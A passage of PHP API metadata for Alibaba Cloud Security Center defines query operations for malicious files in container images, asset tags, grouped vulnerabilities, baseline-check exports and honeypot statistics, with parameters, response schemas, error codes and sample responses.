'name' => 'RepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the image repository.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'hanghai-namespace', 'title' => ''], ], [ 'name' => 'ImageTag', 'in' => 'query', 'schema' => ['description' => 'The image tag.', 'type' => 'string', 'required' => false, 'example' => '0.2', 'title' => ''], ], [ 'name' => 'ImageDigest', 'in' => 'query', 'schema' => ['description' => 'The image digest.', 'type' => 'string', 'required' => false, 'example' => '6a5e103187b31a94592a47a5858617f7****', 'title' => ''], ], [ 'name' => 'ImageLayer', 'in' => 'query', 'schema' => ['description' => 'The image layer.', 'type' => 'string', 'required' => false, 'example' => '27213ad375b53628dd152a5ca****', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID of the server for which you want to query exception events.', 'type' => 'string', 'required' => false, 'example' => 'c556c8133b5ad4378b7fc533ddbda****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of scan ranges.', 'type' => 'array', 'items' => ['description' => 'The scan range. Valid values:'."\n" ."\n" .'- **container**: container'."\n" .'- **image**: image.', 'type' => 'string', 'required' => false, 'example' => 'container', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], [ 'name' => 'MaliciousMd5', 'in' => 'query', 'schema' => ['description' => 'The MD5 hash of the malicious file.', 'type' => 'string', 'required' => false, 'example' => 'd836968041f7683b5459****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '8045E03E-6D91-4C53-9F22-5A1B84BB29D9', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of malicious sample files.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of malicious sample files returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'GroupedMaliciousFileResponse' => [ 'description' => 'The list of malicious sample files.', 'type' => 'array', 'items' => [ 'description' => 'The information about the malicious sample file in the container image.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The handling status of the malicious sample in the container image. Valid values:'."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Handled.'."\n" .'- **2**: Verifying.'."\n" .'- **3**: Whitelisted.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ImageCount' => ['description' => 'The number of images affected by the malicious sample.', 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'LatestScanTimestamp' => ['description' => 'The timestamp of the latest scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1596533942000', 'title' => ''], 'MaliciousName' => ['description' => 'The name of the malicious file.', 'type' => 'string', 'example' => 'testFile', 'title' => ''], 'MaliciousMd5' => ['description' => 'The MD5 hash of the malicious file.', 'type' => 'string', 'example' => 'd836968041f7683b5459****', 'title' => ''], 'FirstScanTimestamp' => ['description' => 'The timestamp of the first scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1594907349000', 'title' => ''], 'Level' => ['description' => 'The severity level of the malicious sample in the container image. Valid values:'."\n" .'- **serious**: urgent'."\n" .'- **suspicious**: suspicious'."\n" .'- **remind**: reminder.', 'type' => 'string', 'example' => 'serious', 'title' => ''], 'MaliciousKey' => ['description' => 'The keyword of the malicious file.', 'type' => 'string', 'example' => 'WEBSHELL_IMG', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query malicious sample files in container images', 'summary' => 'Queries the list of malicious sample files in container images.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedMaliciousFiles'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeGroupedMaliciousFiles', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8045E03E-6D91-4C53-9F22-5A1B84BB29D9\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"Count\\": 2\\n },\\n \\"GroupedMaliciousFileResponse\\": [\\n {\\n \\"Status\\": 0,\\n \\"ImageCount\\": 3,\\n \\"LatestScanTimestamp\\": 1596533942000,\\n \\"MaliciousName\\": \\"testFile\\",\\n \\"MaliciousMd5\\": \\"d836968041f7683b5459****\\",\\n \\"FirstScanTimestamp\\": 1594907349000,\\n \\"Level\\": \\"serious\\",\\n \\"MaliciousKey\\": \\"WEBSHELL_IMG\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeGroupedTags' => [ 'summary' => 'Queries the statistics information of asset labels.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92087', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'MachineTypes', 'in' => 'query', 'schema' => ['description' => 'The type of asset to query. If you do not specify an asset type, tag information for all asset types is queried. Valid values:'."\n" .'- **ecs**: server'."\n" .'- **cloud_product**: cloud product.', 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '151F6EB6-D5F3-417A-AF7B-4D84975DB586', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Count' => ['description' => 'This parameter is deprecated and can be ignored.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'GroupedFileds' => [ 'description' => 'The statistics information of asset labels.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The tag name.', 'type' => 'string', 'example' => 'InternetIp', 'title' => ''], 'Count' => ['description' => 'The number of assets associated with the tag.', 'type' => 'string', 'example' => '152', 'title' => ''], 'TagId' => ['description' => 'The tag ID.', 'type' => 'integer', 'format' => 'int32', 'example' => '3252366', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query label statistics information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedTags'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeGroupedTags', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"HttpStatusCode\\": 200,\\n \\"RequestId\\": \\"151F6EB6-D5F3-417A-AF7B-4D84975DB586\\",\\n \\"Success\\": true,\\n \\"Count\\": 0,\\n \\"GroupedFileds\\": [\\n {\\n \\"Name\\": \\"InternetIp\\",\\n \\"Count\\": \\"152\\",\\n \\"TagId\\": 3252366\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeGroupedVul' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92088', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the vulnerability to query. Default value: cve. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **app**: application vulnerability (network scan)'."\n" .'- **sca**: application vulnerability (software constituency parsing).', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the servers to query. Separate multiple UUIDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'd42f938c-d962-48a0-90f9-05e4ea****', 'title' => ''], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['description' => 'The alias of the vulnerability to query.', 'type' => 'string', 'required' => false, 'example' => 'RHSA-2019:0230-Important: polkit security update', 'title' => ''], ], [ 'name' => 'Necessity', 'in' => 'query', 'schema' => ['description' => 'The priority of the vulnerability fix to query. Separate multiple priorities with commas (,). Valid values:'."\n" ."\n" .'- **asap**: high'."\n" .'- **later**: medium'."\n" .'- **nntf**: low.', 'type' => 'string', 'required' => false, 'example' => 'asap,later,nntf', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the vulnerability is handled. Valid values:'."\n" ."\n" .'- **y**: handled'."\n" .'- **n**: not handled.', 'type' => 'string', 'required' => false, 'example' => 'n', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the first page to display in the query results. Default value: **1**, which indicates that the results start from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of vulnerability entries per page in a paged query. Default value: 10, which indicates that 10 vulnerability entries are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.', 'type' => 'string', 'required' => false, 'example' => '235454', 'title' => ''], ], [ 'name' => 'CveId', 'in' => 'query', 'schema' => ['description' => 'The CVE ID.'."\n" .'> Call the [DescribeVulListPage](~~DescribeVulListPage~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'CVE-2017-15420', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The container search field. Valid values:'."\n" ."\n" .'- **instanceId**: instance ID'."\n" .'- **appName**: application name'."\n" .'- **clusterId**: cluster ID'."\n" .'- **regionId**: region'."\n" .'- **nodeName**: node name'."\n" .'- **namespace**: namespace'."\n" .'- **clusterName**: cluster name'."\n" .'- **image**: image name'."\n" .'- **imageRepoName**: image repository name'."\n" .'- **imageRepoNamespace**: image repository namespace'."\n" .'- **imageRepoTag**: image tag'."\n" .'- **imageDigest**: image digest.', 'type' => 'string', 'required' => false, 'example' => 'appName', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value that corresponds to **ContainerFieldName**.', 'type' => 'string', 'required' => false, 'example' => 'cc914b0df156d40148412afe4a581****', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The container query type. Valid values:'."\n" ."\n" .'- **containerId**: container ID'."\n" .'- **uuid**: asset ID.', 'type' => 'string', 'required' => false, 'example' => 'containerId', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID.', 'type' => 'string', 'required' => false, 'example' => 'c88fb10da1168494091db6aafc5dd****', 'title' => ''], ], [ 'name' => 'SearchTags', 'in' => 'query', 'schema' => ['description' => 'The label used for filtering. Valid values:'."\n" ."\n" .'- **Restart required**'."\n" .'- **Remote utilization**'."\n" .'- **EXP exists**'."\n" .'- **Available**'."\n" .'- **Privilege escalation**'."\n" .'- **Code execution**', 'type' => 'string', 'required' => false, 'example' => 'Code Execution', 'title' => ''], ], [ 'name' => 'AttachTypes', 'in' => 'query', 'schema' => ['description' => 'The vulnerability type. This query condition is valid only for application vulnerabilities. Separate multiple values with commas (,). Valid values:'."\n" .'- **sca**: software constituency parsing vulnerability'."\n" .'- **app**: application vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'sca', 'title' => ''], ], [ 'name' => 'AssetType', 'in' => 'query', 'schema' => ['description' => 'The Asset Type where the vulnerability is detected. Separate multiple types with commas (,). Valid values:'."\n" .'- **ECS**: host asset'."\n" .'- **CONTAINER**: container asset.', 'type' => 'string', 'required' => false, 'example' => 'ECS,CONTAINER', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the Alibaba Cloud account that is added as one of the member accounts in a resource folder.'."\n" .'> Invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], [ 'name' => 'RaspDefend', 'in' => 'query', 'schema' => ['description' => 'Specifies whether Runtime Application Self-Protection (RASP) supports real-time protection against the vulnerability. Valid values:'."\n" ."\n" .'- **0**: Not supported.'."\n" .'- **1**: Supported.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response for querying vulnerability information by group.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '9BFA6D78-07EA-5C0A-9358-E4434573507B', 'title' => ''], 'PageSize' => ['description' => 'The number of vulnerability entries per page in a paged query. Default value: 10, which indicates that 10 vulnerability entries are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of query results.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'GroupedVulItems' => [ 'description' => 'The vulnerability information returned by the query.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability'."\n" .'- **cms**: Web-CMS vulnerability'."\n" .'- **app**: application vulnerability'."\n" .'- **emg**: emergency vulnerability'."\n" .'- **sca**: software constituency parsing.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'NntfCount' => ['description' => 'The number of vulnerabilities with a fix priority of **low**.', 'type' => 'integer', 'format' => 'int32', 'example' => '59', 'title' => ''], 'RaspDefend' => ['description' => 'Indicates whether RASP real-time protection is supported. Valid values:'."\n" .'- **0**: Not supported.'."\n" .'- **1**: Supported.'."\n" .'> If this property is not present, RASP real-time protection is not supported.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'HandledCount' => ['description' => 'The number of handled vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'GmtFirst' => ['description' => 'The timestamp when the vulnerability was first detected, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1639371046000', 'title' => ''], 'GmtLast' => ['description' => 'The timestamp when the vulnerability was last detected, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1639371446000', 'title' => ''], 'Tags' => ['description' => 'The vulnerability label. Valid values:'."\n" ."\n" .'- **Restart required**'."\n" .'- **Remote utilization**'."\n" .'- **EXP exists**'."\n" .'- **Available**'."\n" .'- **Privilege escalation**'."\n" .'- **Code execution**', 'type' => 'string', 'example' => 'Code Execution', 'title' => ''], 'LaterCount' => ['description' => 'The number of vulnerabilities with a fix priority of **medium**.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'example' => 'RHSA-2017:0184-Important: mysql security update', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'oval:com.redhat.rhsa:def:20170184', 'title' => ''], 'TotalFixCount' => ['description' => 'The total number of fixed vulnerabilities.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'AsapCount' => ['description' => 'The number of vulnerabilities with a fix priority of **high**.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Related' => ['description' => 'The list of CVEs associated with the vulnerability.', 'type' => 'string', 'example' => 'CVE-2023-24881,CVE-2023-24898', 'title' => ''], 'LanguageType' => ['description' => 'The language type associated with the vulnerability. Valid values:'."\n" .'- **java**'."\n" .'- **php**'."\n" .'> This parameter applies only to sca vulnerabilities.', 'type' => 'string', 'example' => 'java', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Query vulnerability information by group', 'summary' => 'Queries vulnerability information by group.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '50', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedVul'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeGroupedVul', 'authLevel' => 'resource', 'actionConditions' => [ ['conditionKey' => 'acs:ResourceGroupId', 'validationType' => 'always'], ], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CurrentPage\\": 1,\\n \\"RequestId\\": \\"9BFA6D78-07EA-5C0A-9358-E4434573507B\\",\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 1,\\n \\"GroupedVulItems\\": [\\n {\\n \\"Type\\": \\"cve\\",\\n \\"NntfCount\\": 59,\\n \\"RaspDefend\\": 1,\\n \\"HandledCount\\": 0,\\n \\"GmtFirst\\": 1639371046000,\\n \\"GmtLast\\": 1639371446000,\\n \\"Tags\\": \\"Code Execution\\",\\n \\"LaterCount\\": 0,\\n \\"AliasName\\": \\"RHSA-2017:0184-Important: mysql security update\\",\\n \\"Name\\": \\"oval:com.redhat.rhsa:def:20170184\\",\\n \\"TotalFixCount\\": 0,\\n \\"AsapCount\\": 0,\\n \\"Related\\": \\"CVE-2023-24881,CVE-2023-24898\\",\\n \\"LanguageType\\": \\"java\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeHcExportInfo' => [ 'summary' => 'Queries information about a baseline risk export, such as the file name and download link.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ExportId', 'in' => 'query', 'schema' => ['description' => 'The ID of the export task. Call the [ExportWarning](~~425092~~) operation to obtain the task ID (**Id**).', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '443285', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The baseline risk export information.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '3C2C94CF-ED08-50C0-BC72-C5029251****', 'title' => ''], 'FileName' => ['description' => 'The name of the exported file.', 'type' => 'string', 'example' => 'health_check_export_2022****', 'title' => ''], 'CurrentCount' => ['description' => 'The number of data entries that have been exported.', 'type' => 'integer', 'format' => 'int32', 'example' => '148', 'title' => ''], 'Link' => ['description' => 'The download link of the exported file.', 'type' => 'string', 'example' => 'https://hc-export.oss-cn-shanghai.aliyuncs.com/export_hc/health_check_export_20221222_1671699255808.zip?Expires=1672304056&OSSAccessKeyId=****&Signature=****', 'title' => ''], 'Progress' => ['description' => 'The export progress in percentage (%).', 'type' => 'integer', 'format' => 'int32', 'example' => '89', 'title' => ''], 'Id' => ['description' => 'The ID of the export task.', 'type' => 'integer', 'format' => 'int64', 'example' => '1082278', 'title' => ''], 'TotalCount' => ['description' => 'The total number of data entries to be exported.', 'type' => 'integer', 'format' => 'int32', 'example' => '624', 'title' => ''], 'GmtCreate' => ['description' => 'The time when the task was created.', 'type' => 'integer', 'format' => 'int64', 'example' => '2022-11-03T15:15Z', 'title' => ''], 'ResultStatus' => ['description' => 'The status of the export task. Valid values:'."\n" ."\n" .'- **exporting**: The export is in progress.'."\n" ."\n" .'- **success**: The export is successful.', 'type' => 'string', 'example' => 'exporting', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query baseline risk export information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHcExportInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeHcExportInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3C2C94CF-ED08-50C0-BC72-C5029251****\\",\\n \\"FileName\\": \\"health_check_export_2022****\\",\\n \\"CurrentCount\\": 148,\\n \\"Link\\": \\"https://hc-export.oss-cn-shanghai.aliyuncs.com/export_hc/health_check_export_20221222_1671699255808.zip?Expires=1672304056&OSSAccessKeyId=****&Signature=****\\",\\n \\"Progress\\": 89,\\n \\"Id\\": 1082278,\\n \\"TotalCount\\": 624,\\n \\"GmtCreate\\": 0,\\n \\"ResultStatus\\": \\"exporting\\"\\n}","type":"json"}]', ], 'DescribeHoneyPotAuth' => [ 'summary' => 'Queries the number of authorized honeypot instances.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '0F5023B6-9C1F-459F-ACCC-8B4636804037', 'title' => ''], 'HoneyPotCount' => ['description' => 'The number of consumed authorizations.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'HoneyPotAuthCount' => ['description' => 'The total number of authorizations.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the number of authorized honeypot instances', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeHoneyPotAuth', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneyPot', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypot/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0F5023B6-9C1F-459F-ACCC-8B4636804037\\",\\n \\"HoneyPotCount\\": 4,\\n \\"HoneyPotAuthCount\\": 10\\n}","type":"json"}]', ], 'DescribeHoneyPotSuspStatistics' => [ 'summary' => 'Queries information about the top 5 VPCs or assets ranked by the number of security alerts.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source of the request. Set the value to **honeypot**.', 'type' => 'string', 'required' => true, 'example' => 'honeypot', 'title' => ''], ], [ 'name' => 'StatisticsKeyType', 'in' => 'query', 'schema' => ['description' => 'The Asset Type to query. Valid values:'."\n" .'- **vpcInstanceId**: VPC-connected instance'."\n" .'- **uuid**: server', 'type' => 'string', 'required' => true, 'example' => 'vpcInstanceId', 'title' => ''], ], [ 'name' => 'StatisticsDays', 'in' => 'query', 'schema' => ['description' => 'The time range of the data to query. Unit: days.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '30', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '9E3969FA-5ACC-4256-9FDE-BB6918CD0410', 'title' => ''], 'SuspHoneyPotStatisticsResponse' => [ 'description' => 'The list of top 5 VPCs or assets ranked by the number of security alerts.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The Asset Type queried. Valid values:'."\n" .'- **vpcInstanceId**: VPC-connected instance'."\n" .'- **uuid**: server', 'type' => 'string', 'example' => 'vpcInstanceId', 'title' => ''], 'VpcId' => ['description' => 'The VPC-connected instance ID.'."\n" .'> This parameter is returned only when the request parameter **StatisticsKeyType** is set to **vpcInstanceId**.', 'type' => 'string', 'example' => 'vpc-p0wwdsuutdyu1ygkt****', 'title' => ''], 'VpcName' => ['description' => 'The VPC-connected instance name.'."\n" .'> This parameter is returned only when the request parameter **StatisticsKeyType** is set to **vpcInstanceId**.', 'type' => 'string', 'example' => 'abc01', 'title' => ''], 'InstanceName' => ['description' => 'The server name.'."\n" .'> This parameter is returned only when the request parameter **StatisticsKeyType** is set to **uuid**.', 'type' => 'string', 'example' => 'abc-launch-advisor', 'title' => ''], 'InstanceId' => ['description' => 'The server instance ID.'."\n" .'> This 